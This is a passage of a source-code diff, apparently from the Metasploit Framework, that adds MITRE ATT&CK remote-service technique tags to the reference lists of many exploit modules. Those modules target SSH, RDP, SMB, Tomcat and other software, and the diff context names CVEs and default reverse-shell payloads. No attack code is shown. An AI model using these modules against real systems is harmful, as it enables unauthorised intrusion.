default password [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_drm/ibm_drm_rce.md' ], [ 'URL', 'https://seclists.org/fulldisclosure/2020/Apr/33' ], - [ 'URL', 'https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-exist-in-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430/'] + [ 'URL', 'https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-exist-in-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430/'], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ] ], 'Payload' => { 'Compat' => { diff --git a/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb b/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb index 26060244ed3c7..ac9083ba7b15b 100644 --- a/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb +++ b/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb @@ -37,7 +37,8 @@ def initialize(info = {}) 'Author' => 'xistence ', # Discovery, Metasploit module 'License' => MSF_LICENSE, 'References' => [ - ['PACKETSTORM', '125754'] + ['PACKETSTORM', '125754'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] ], 'DisclosureDate' => '2014-03-17', 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, diff --git a/modules/exploits/linux/ssh/mercurial_ssh_exec.rb b/modules/exploits/linux/ssh/mercurial_ssh_exec.rb index 47cdebb13f9a8..8eecf438679eb 100644 --- a/modules/exploits/linux/ssh/mercurial_ssh_exec.rb +++ b/modules/exploits/linux/ssh/mercurial_ssh_exec.rb @@ -24,7 +24,8 @@ def initialize(info = {}) ], 'References' => [ [ 'CVE', '2017-9462' ], - ['URL', 'https://www.mercurial-scm.org/wiki/WhatsNew#Mercurial_4.1.3_.282017-4-18.29'] + [ 'URL', 'https://www.mercurial-scm.org/wiki/WhatsNew#Mercurial_4.1.3_.282017-4-18.29' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ] ], 'DefaultOptions' => { 'Payload' => 'python/meterpreter/reverse_tcp' diff --git a/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb b/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb index 30732a229fd4c..c8739dbd2f3ce 100644 --- a/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb +++ b/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb @@ -36,7 +36,8 @@ def initialize(info = {}) 'Author' => 'xistence ', # Discovery, Metasploit module 'License' => MSF_LICENSE, 'References' => [ - ['PACKETSTORM', '125755'] + ['PACKETSTORM', '125755'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] ], 'DisclosureDate' => '2014-03-17', 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, diff --git a/modules/exploits/linux/ssh/solarwinds_lem_exec.rb b/modules/exploits/linux/ssh/solarwinds_lem_exec.rb index 13ba188eb9e7e..da03af4598f2e 100644 --- a/modules/exploits/linux/ssh/solarwinds_lem_exec.rb +++ b/modules/exploits/linux/ssh/solarwinds_lem_exec.rb @@ -26,7 +26,8 @@ def initialize(info = {}) ], 'References' => [ ['CVE', '2017-7722'], - ['URL', 'http://web.archive.org/web/20250221015511/https://pentest.blog/unexpected-journey-4-escaping-from-restricted-shell-and-gaining-root-access-to-solarwinds-log-event-manager-siem-product/'] + ['URL', 'http://web.archive.org/web/20250221015511/https://pentest.blog/unexpected-journey-4-escaping-from-restricted-shell-and-gaining-root-access-to-solarwinds-log-event-manager-siem-product/'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] ], 'DefaultOptions' => { 'Payload' => 'python/meterpreter/reverse_tcp' diff --git a/modules/exploits/linux/ssh/ssh_erlangotp_rce.rb b/modules/exploits/linux/ssh/ssh_erlangotp_rce.rb index 9bc3440168c45..359d62053c2b7 100644 --- a/modules/exploits/linux/ssh/ssh_erlangotp_rce.rb +++ b/modules/exploits/linux/ssh/ssh_erlangotp_rce.rb @@ -37,7 +37,8 @@ def initialize(info = {}) ['CVE', '2025-32433'], ['URL', 'https://x.com/Horizon3Attack/status/1912945580902334793'], ['URL', 'https://platformsecurity.com/blog/CVE-2025-32433-poc'], - ['URL', 'https://github.com/ProDefense/CVE-2025-32433'] + ['URL', 'https://github.com/ProDefense/CVE-2025-32433'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] ], 'Platform' => ['linux', 'unix'], 'Arch' => [ARCH_CMD], diff --git a/modules/exploits/linux/ssh/symantec_smg_ssh.rb b/modules/exploits/linux/ssh/symantec_smg_ssh.rb index f6c12aa36bfca..770f162a9cfb7 100644 --- a/modules/exploits/linux/ssh/symantec_smg_ssh.rb +++ b/modules/exploits/linux/ssh/symantec_smg_ssh.rb @@ -31,7 +31,8 @@ def initialize(info = {}) ['CVE', '2012-3579'], ['OSVDB', '85028'], ['BID', '55143'], - ['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120827_00'] + ['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120827_00'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread' diff --git a/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb b/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb index a9b3eefdff321..5b6c212de6b15 100644 --- a/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb +++ b/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb @@ -36,6 +36,7 @@ def initialize(info = {}) 'References' => [ [ 'CVE', '2016-7456' ], [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2016-0024.html' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ], ], 'DisclosureDate' => '2016-12-20', 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, diff --git a/modules/exploits/linux/ssh/vmware_vrni_known_privkey.rb b/modules/exploits/linux/ssh/vmware_vrni_known_privkey.rb index 64dedec97d03c..87c70c42f094d 100644 --- a/modules/exploits/linux/ssh/vmware_vrni_known_privkey.rb +++ b/modules/exploits/linux/ssh/vmware_vrni_known_privkey.rb @@ -71,6 +71,7 @@ def initialize(info = {}) ['URL', 'https://github.com/sinsinology/CVE-2023-34039'], ['URL', 'https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/'], ['URL', 'https://www.vmware.com/security/advisories/VMSA-2023-0018.html'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH], ], 'DisclosureDate' => '2023-08-29', 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, diff --git a/modules/exploits/linux/telnet/netgear_telnetenable.rb b/modules/exploits/linux/telnet/netgear_telnetenable.rb index 110f9f47e1fbf..a3fefa92e70af 100644 --- a/modules/exploits/linux/telnet/netgear_telnetenable.rb +++ b/modules/exploits/linux/telnet/netgear_telnetenable.rb @@ -28,7 +28,8 @@ def initialize(info = {}) 'References' => [ ['URL', 'https://wiki.openwrt.org/toh/netgear/telnet.console'], ['URL', 'https://github.com/cyanitol/netgear-telenetenable'], - ['URL', 'https://github.com/insanid/netgear-telenetenable'] + ['URL', 'https://github.com/insanid/netgear-telenetenable'], + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'DisclosureDate' => '2009-10-30', # Python PoC (TCP) 'License' => MSF_LICENSE, diff --git a/modules/exploits/multi/http/atlassian_confluence_rce_cve_2024_21683.rb b/modules/exploits/multi/http/atlassian_confluence_rce_cve_2024_21683.rb index 3bf479a3ded6c..9af284f72a230 100644 --- a/modules/exploits/multi/http/atlassian_confluence_rce_cve_2024_21683.rb +++ b/modules/exploits/multi/http/atlassian_confluence_rce_cve_2024_21683.rb @@ -34,7 +34,8 @@ def initialize(info = {}) ['CVE', '2024-21683'], ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-95832'], ['URL', 'https://realalphaman.substack.com/p/quick-note-about-cve-2024-21683-authenticated'], - ['URL', 'https://github.com/W01fh4cker/CVE-2024-21683-RCE'] + ['URL', 'https://github.com/W01fh4cker/CVE-2024-21683-RCE'], + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'DisclosureDate' => '2024-05-21', 'Privileged' => false, # `NT AUTHORITY\NETWORK SERVICE` on Windows by default, `confluence` on Linux by default. diff --git a/modules/exploits/multi/http/connectwise_screenconnect_rce_cve_2024_1709.rb b/modules/exploits/multi/http/connectwise_screenconnect_rce_cve_2024_1709.rb index 3b9c4da47e112..50ba0d0e97718 100644 --- a/modules/exploits/multi/http/connectwise_screenconnect_rce_cve_2024_1709.rb +++ b/modules/exploits/multi/http/connectwise_screenconnect_rce_cve_2024_1709.rb @@ -31,7 +31,8 @@ def initialize(info = {}) ['CVE', '2024-1709'], # Auth bypass to create admin account. ['URL', 'https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8'], # Vendor Advisory ['URL', 'https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc/'], # Auth Bypass PoC - ['URL', 'https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass'] # Analysis of both CVEs + ['URL', 'https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass'], # Analysis of both CVEs + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'DisclosureDate' => '2024-02-19', 'Platform' => %w[win linux unix], diff --git a/modules/exploits/multi/http/glassfish_deployer.rb b/modules/exploits/multi/http/glassfish_deployer.rb index f9602859ab7a0..0d0623d4ab8cc 100644 --- a/modules/exploits/multi/http/glassfish_deployer.rb +++ b/modules/exploits/multi/http/glassfish_deployer.rb @@ -35,7 +35,8 @@ def initialize(info = {}) ], 'References' => [ ['CVE', '2011-0807'], - ['OSVDB', '71948'] + ['OSVDB', '71948'], + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'Platform' => ['win', 'linux', 'java'], 'Targets' => [ diff --git a/modules/exploits/multi/http/orientdb_exec.rb b/modules/exploits/multi/http/orientdb_exec.rb index 13587a132deaf..f894530072295 100644 --- a/modules/exploits/multi/http/orientdb_exec.rb +++ b/modules/exploits/multi/http/orientdb_exec.rb @@ -27,7 +27,8 @@ def initialize(info = {}) ['CVE', '2017-11467'], ['URL', 'https://blogs.securiteam.com/index.php/archives/3318'], ['URL', 'http://www.palada.net/index.php/2017/07/13/news-2112/'], - ['URL', 'https://github.com/orientechnologies/orientdb/wiki/OrientDB-2.2-Release-Notes#2223---july-11-2017'] + ['URL', 'https://github.com/orientechnologies/orientdb/wiki/OrientDB-2.2-Release-Notes#2223---july-11-2017'], + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'Platform' => %w{linux unix win}, 'Privileged' => false, diff --git a/modules/exploits/multi/http/splunk_mappy_exec.rb b/modules/exploits/multi/http/splunk_mappy_exec.rb index 9746025f40aa0..4b89cc57dd85a 100644 --- a/modules/exploits/multi/http/splunk_mappy_exec.rb +++ b/modules/exploits/multi/http/splunk_mappy_exec.rb @@ -32,7 +32,8 @@ def initialize(info = {}) [ 'BID', '51061' ], [ 'CVE', '2011-4642' ], [ 'URL', 'http://www.splunk.com/view/SP-CAAAGMM' ], - [ 'URL', 'http://www.sec-1.com/blog/?p=233' ] + [ 'URL', 'http://www.sec-1.com/blog/?p=233' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ] ], 'Payload' => { 'Space' => 1024, diff --git a/modules/exploits/multi/http/tomcat_mgr_deploy.rb b/modules/exploits/multi/http/tomcat_mgr_deploy.rb index 952f1230cc484..791b77b1a38cb 100644 --- a/modules/exploits/multi/http/tomcat_mgr_deploy.rb +++ b/modules/exploits/multi/http/tomcat_mgr_deploy.rb @@ -57,7 +57,8 @@ def initialize(info = {}) [ 'BID', '36954' ], # tomcat docs - [ 'URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html' ] + [ 'URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ] ], 'Platform' => %w{java linux win}, # others? 'Targets' => [ diff --git a/modules/exploits/multi/http/tomcat_mgr_upload.rb b/modules/exploits/multi/http/tomcat_mgr_upload.rb index 26e896fa58bd7..1530e752cba48 100644 --- a/modules/exploits/multi/http/tomcat_mgr_upload.rb +++ b/modules/exploits/multi/http/tomcat_mgr_upload.rb @@ -62,7 +62,8 @@ def initialize(info = {}) ['BID', '36954'], # tomcat docs - ['URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html'] + ['URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html'], + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES], ], 'Platform' => %w{java linux win}, # others? 'Targets' => [ diff --git a/modules/exploits/multi/misc/bmc_server_automation_rscd_nsh_rce.rb b/modules/exploits/multi/misc/bmc_server_automation_rscd_nsh_rce.rb index a4d259e4a7c59..538d2cdb4938d 100644 --- a/modules/exploits/multi/misc/bmc_server_automation_rscd_nsh_rce.rb +++ b/modules/exploits/multi/misc/bmc_server_automation_rscd_nsh_rce.rb @@ -31,7 +31,8 @@ def initialize(info = {}) ['URL', 'https://nickbloor.co.uk/2018/01/01/rce-with-bmc-server-automation/'], ['URL', 'https://nickbloor.co.uk/2018/01/08/improving-the-bmc-rscd-rce-exploit/'], ['CVE', '2016-1542'], - ['CVE', '2016-1543'] + ['CVE', '2016-1543'], + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'DisclosureDate' => '2016-03-16', 'Privileged' => false, diff --git a/modules/exploits/multi/ssh/sshexec.rb b/modules/exploits/multi/ssh/sshexec.rb index 9b712a521964b..7868e341e8f1d 100644 --- a/modules/exploits/multi/ssh/sshexec.rb +++ b/modules/exploits/multi/ssh/sshexec.rb @@ -21,7 +21,8 @@ def initialize ), 'Author' => ['Spencer McIntyre', 'Brandon Knight'], 'References' => [ - [ 'CVE', '1999-0502'] # Weak password + [ 'CVE', '1999-0502'], # Weak password + [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ] ], 'License' => MSF_LICENSE, 'Privileged' => true, diff --git a/modules/exploits/multi/vnc/vnc_keyboard_exec.rb b/modules/exploits/multi/vnc/vnc_keyboard_exec.rb index 089a3bade8095..28b21907fda29 100644 --- a/modules/exploits/multi/vnc/vnc_keyboard_exec.rb +++ b/modules/exploits/multi/vnc/vnc_keyboard_exec.rb @@ -34,7 +34,8 @@ def initialize(info = {}) [ 'VNC Linux / Unix', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ] ], 'References' => [ - [ 'URL', 'http://www.jedi.be/blog/2010/08/29/sending-keystrokes-to-your-virtual-machines-using-X-vnc-rdp-or-native/'] + [ 'URL', 'http://www.jedi.be/blog/2010/08/29/sending-keystrokes-to-your-virtual-machines-using-X-vnc-rdp-or-native/'], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_005_VNC ] ], 'DisclosureDate' => '2015-07-10', 'DefaultTarget' => 0, diff --git a/modules/exploits/osx/http/remote_for_mac_rce.rb b/modules/exploits/osx/http/remote_for_mac_rce.rb index bf0cfed03f708..fa082a92b5c34 100644 --- a/modules/exploits/osx/http/remote_for_mac_rce.rb +++ b/modules/exploits/osx/http/remote_for_mac_rce.rb @@ -22,7 +22,8 @@ def initialize(info = {}) 'Author' => ['Chokri Hammedi (@blue0x1)'], 'References' => [ ['CVE', '2025-34089'], - ['PACKETSTORM', '195347'] + ['PACKETSTORM', '195347'], + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'DisclosureDate' => '2025-05-27', 'Platform' => ['unix', 'osx'], diff --git a/modules/exploits/solaris/telnet/fuser.rb b/modules/exploits/solaris/telnet/fuser.rb index 88f8fb932a751..21ac02d28955e 100644 --- a/modules/exploits/solaris/telnet/fuser.rb +++ b/modules/exploits/solaris/telnet/fuser.rb @@ -23,6 +23,7 @@ def initialize(info = {}) [ 'CVE', '2007-0882' ], [ 'OSVDB', '31881'], [ 'BID', '22512' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ], ], 'Privileged' => false, 'Platform' => %w[solaris unix], diff --git a/modules/exploits/solaris/telnet/ttyprompt.rb b/modules/exploits/solaris/telnet/ttyprompt.rb index 1dced18ec3a65..ba3fe5cb3f065 100644 --- a/modules/exploits/solaris/telnet/ttyprompt.rb +++ b/modules/exploits/solaris/telnet/ttyprompt.rb @@ -23,6 +23,7 @@ def initialize(info = {}) ['CVE', '2001-0797'], ['OSVDB', '690'], ['BID', '5531'], + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES], ], 'Privileged' => false, 'Platform' => %w[solaris unix], diff --git a/modules/exploits/unix/ssh/tectia_passwd_changereq.rb b/modules/exploits/unix/ssh/tectia_passwd_changereq.rb index 8e29a8e5df6bd..521d55688b63c 100644 --- a/modules/exploits/unix/ssh/tectia_passwd_changereq.rb +++ b/modules/exploits/unix/ssh/tectia_passwd_changereq.rb @@ -33,7 +33,8 @@ def initialize(info = {}) ['CVE', '2012-5975'], ['EDB', '23082'], ['OSVDB', '88103'], - ['URL', 'https://seclists.org/fulldisclosure/2012/Dec/12'] + ['URL', 'https://seclists.org/fulldisclosure/2012/Dec/12'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] ], 'Payload' => { 'Compat' => diff --git a/modules/exploits/windows/dcerpc/cve_2021_1675_printnightmare.rb b/modules/exploits/windows/dcerpc/cve_2021_1675_printnightmare.rb index 3d0515a6496c6..c8307a779fa88 100644 --- a/modules/exploits/windows/dcerpc/cve_2021_1675_printnightmare.rb +++ b/modules/exploits/windows/dcerpc/cve_2021_1675_printnightmare.rb @@ -61,7 +61,8 @@ def initialize(info = {}) ['URL', 'https://github.com/cube0x0/CVE-2021-1675'], ['URL', 'https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare'], ['URL', 'https://github.com/calebstewart/CVE-2021-1675/blob/main/CVE-2021-1675.ps1'], - ['URL', 'https://github.com/byt3bl33d3r/ItWasAllADream'] + ['URL', 'https://github.com/byt3bl33d3r/ItWasAllADream'], + ['ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES] ], 'Notes' => { 'AKA' => [ 'PrintNightmare' ], diff --git a/modules/exploits/windows/http/nscp_authenticated_rce.rb b/modules/exploits/windows/http/nscp_authenticated_rce.rb index 7f36aeff457ae..c2af1caa32e25 100644 --- a/modules/exploits/windows/http/nscp_authenticated_rce.rb +++ b/modules/exploits/windows/http/nscp_authenticated_rce.rb @@ -30,7 +30,8 @@ def initialize(info = {}) ], 'References' => [ ['CVE', '2025-34079'], - ['EDB', '48360'] + ['EDB', '48360'], + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'Platform' => %w[windows], 'Arch' => [ARCH_X64], diff --git a/modules/exploits/windows/imap/mercury_login.rb b/modules/exploits/windows/imap/mercury_login.rb index 419413893ab98..710e06b96ea74 100644 --- a/modules/exploits/windows/imap/mercury_login.rb +++ b/modules/exploits/windows/imap/mercury_login.rb @@ -29,7 +29,8 @@ def initialize(info = {}) 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2007-1373'], - ['EDB', '3418'] + ['EDB', '3418'], + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'Privileged' => true, 'DefaultOptions' => { diff --git a/modules/exploits/windows/local/powershell_remoting.rb b/modules/exploits/windows/local/powershell_remoting.rb index e09a7fde86ba7..b38bb899e7f4c 100644 --- a/modules/exploits/windows/local/powershell_remoting.rb +++ b/modules/exploits/windows/local/powershell_remoting.rb @@ -22,7 +22,8 @@ def initialize(info = {}) 'Author' => [ 'Ben Campbell' ], 'References' => [ [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default) - [ 'OSVDB', '3106'] + [ 'OSVDB', '3106'], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_006_WINDOWS_REMOTE_MANAGEMENT ] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread' diff --git a/modules/exploits/windows/local/wmi.rb b/modules/exploits/windows/local/wmi.rb index 61321d6a26fee..a97682ba5e921 100644 --- a/modules/exploits/windows/local/wmi.rb +++ b/modules/exploits/windows/local/wmi.rb @@ -37,6 +37,7 @@ def initialize(info = {}) [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default) [ 'OSVDB', '3106'], [ 'URL', 'http://passing-the-hash.blogspot.co.uk/2013/07/WMIS-PowerSploit-Shells.html' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ], ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', diff --git a/modules/exploits/windows/misc/unified_remote_rce.rb b/modules/exploits/windows/misc/unified_remote_rce.rb index 44d3e52e28344..6c694585a99f8 100644 --- a/modules/exploits/windows/misc/unified_remote_rce.rb +++ b/modules/exploits/windows/misc/unified_remote_rce.rb @@ -37,7 +37,8 @@ def initialize(info = {}) [ 'EDB', '49587' ], [ 'URL', 'https://www.unifiedremote.com/' ], [ 'URL', 'https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/unified%20remote/unified-remote-rce.py' ], - [ 'CVE', '2022-3229' ] + [ 'CVE', '2022-3229' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ] ], 'Arch' => [ ARCH_X64, ARCH_X86 ], 'Platform' => 'win', diff --git a/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb b/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb index d5aedddd75508..ea4eacaab03b3 100644 --- a/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb +++ b/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb @@ -95,7 +95,8 @@ def initialize(info = {}) ['URL', 'https://github.com/zerosum0x0/CVE-2019-0708'], ['URL', 'https://zerosum0x0.blogspot.com/2019/11/fixing-remote-windows-kernel-payloads-meltdown.html'], ['ATT&CK', Mitre::Attack::Technique::T1059_COMMAND_AND_SCRIPTING_INTERPRETER], - ['ATT&CK', Mitre::Attack::Technique::T1068_EXPLOITATION_FOR_PRIVILEGE_ESCALATION] + ['ATT&CK', Mitre::Attack::Technique::T1068_EXPLOITATION_FOR_PRIVILEGE_ESCALATION], + ['ATT&CK', Mitre::Attack::Technique::T1021_001_REMOTE_DESKTOP_PROTOCOL] ], 'DefaultOptions' => { 'RDP_CLIENT_NAME' => 'ethdev', diff --git a/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb b/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb index fd4bdc38ea8d1..24dd343da39f3 100644 --- a/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb +++ b/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb @@ -32,7 +32,8 @@ def initialize(info = {}) 'Spencer McIntyre' # RDP DOPU analysis ], 'References' => [ - ['URL', 'https://github.com/countercept/doublepulsar-detection-script'] + ['URL', 'https://github.com/countercept/doublepulsar-detection-script'], + ['ATT&CK', Mitre::Attack::Technique::T1021_001_REMOTE_DESKTOP_PROTOCOL] ], 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/smb/cve_2020_0796_smbghost.rb b/modules/exploits/windows/smb/cve_2020_0796_smbghost.rb index 883269a3d571a..766ad263ebd71 100644 --- a/modules/exploits/windows/smb/cve_2020_0796_smbghost.rb +++ b/modules/exploits/windows/smb/cve_2020_0796_smbghost.rb @@ -44,7 +44,8 @@ def initialize(info = {}) [ 'URL', 'https://www.youtube.com/watch?v=RSV3f6aEJFY&t=1865s' ], [ 'URL', 'https://www.coresecurity.com/core-labs/articles/getting-physical-extreme-abuse-of-intel-based-paging-systems' ], [ 'URL', 'https://www.coresecurity.com/core-labs/articles/getting-physical-extreme-abuse-of-intel-based-paging-systems-part-2-windows' ], - [ 'URL', 'https://labs.bluefrostsecurity.de/blog/2017/05/11/windows-10-hals-heap-extinction-of-the-halpinterruptcontroller-table-exploitation-technique/' ] + [ 'URL', 'https://labs.bluefrostsecurity.de/blog/2017/05/11/windows-10-hals-heap-extinction-of-the-halpinterruptcontroller-table-exploitation-technique/' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', diff --git a/modules/exploits/windows/smb/ipass_pipe_exec.rb b/modules/exploits/windows/smb/ipass_pipe_exec.rb index 145b32662bc15..59bd0c806e368 100644 --- a/modules/exploits/windows/smb/ipass_pipe_exec.rb +++ b/modules/exploits/windows/smb/ipass_pipe_exec.rb @@ -30,6 +30,7 @@ def initialize(info = {}) [ 'OSVDB', '117423' ], [ 'BID', '72265' ], [ 'URL', 'http://codewhitesec.blogspot.de/2015/02/how-i-could-ipass-your-client-security.html' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', diff --git a/modules/exploits/windows/smb/smb_doublepulsar_rce.rb b/modules/exploits/windows/smb/smb_doublepulsar_rce.rb index a0d905fdb6db1..3526bea7bc595 100644 --- a/modules/exploits/windows/smb/smb_doublepulsar_rce.rb +++ b/modules/exploits/windows/smb/smb_doublepulsar_rce.rb @@ -47,7 +47,8 @@ def initialize(info = {}) ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'], ['URL', 'https://github.com/countercept/doublepulsar-detection-script'], ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'], - ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1'] + ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1'], + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/smb/smb_relay.rb b/modules/exploits/windows/smb/smb_relay.rb index cbb333fb02848..c2dc6940134dd 100644 --- a/modules/exploits/windows/smb/smb_relay.rb +++ b/modules/exploits/windows/smb/smb_relay.rb @@ -83,7 +83,8 @@ module is not able to clean up after itself. The service and payload ['MSB', 'MS08-068'], ['URL', 'http://blogs.technet.com/swi/archive/2008/11/11/smb-credential-reflection.aspx'], ['URL', 'https://en.wikipedia.org/wiki/SMBRelay'], - ['URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx'] + ['URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx'], + ['ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES] ], 'Arch' => [ARCH_X86, ARCH_X64], 'Platform' => 'win', diff --git a/modules/exploits/windows/smb/smb_shadow.rb b/modules/exploits/windows/smb/smb_shadow.rb index 27f776a44c698..c554def21d1bf 100644 --- a/modules/exploits/windows/smb/smb_shadow.rb +++ b/modules/exploits/windows/smb/smb_shadow.rb @@ -38,7 +38,8 @@ def initialize(info = {}) 'Privileged' => true, 'Payload' => {}, 'References' => [ - ['URL', 'https://strontium.io/blog/introducing-windows-10-smb-shadow-attack'] + ['URL', 'https://strontium.io/blog/introducing-windows-10-smb-shadow-attack'], + ['ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES] ], 'Arch' => [ARCH_X86, ARCH_X64], 'Platform' => 'win', diff --git a/modules/exploits/windows/ssh/freesshd_authbypass.rb b/modules/exploits/windows/ssh/freesshd_authbypass.rb index 2842e36820df5..5e0ac8626a01a 100644 --- a/modules/exploits/windows/ssh/freesshd_authbypass.rb +++ b/modules/exploits/windows/ssh/freesshd_authbypass.rb @@ -32,7 +32,8 @@ def initialize(info = {}) ['OSVDB', '88006'], ['BID', '56785'], ['URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0012.html'], - ['URL', 'https://seclists.org/fulldisclosure/2010/Aug/132'] + ['URL', 'https://seclists.org/fulldisclosure/2010/Aug/132'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] ], 'Platform' => 'win', 'Privileged' => true, diff --git a/modules/exploits/windows/winrm/winrm_script_exec.rb b/modules/exploits/windows/winrm/winrm_script_exec.rb index 6833d456d71ec..8df54ecc7d93c 100644 --- a/modules/exploits/windows/winrm/winrm_script_exec.rb +++ b/modules/exploits/windows/winrm/winrm_script_exec.rb @@ -28,6 +28,7 @@ def initialize(info = {}) 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'http://msdn.microsoft.com/en-us/library/windows/desktop/aa384426(v=vs.85).aspx' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_006_WINDOWS_REMOTE_MANAGEMENT ], ], 'Privileged' => true, 'DefaultOptions' => { diff --git a/modules/post/linux/manage/sshkey_persistence.rb b/modules/post/linux/manage/sshkey_persistence.rb index d87ebacfc778a..ea12d45c9ad9f 100644 --- a/modules/post/linux/manage/sshkey_persistence.rb +++ b/modules/post/linux/manage/sshkey_persistence.rb @@ -37,7 +37,10 @@ def initialize(info = {}) stdapi_fs_separator ] } - } + }, + 'References' => [ + [ 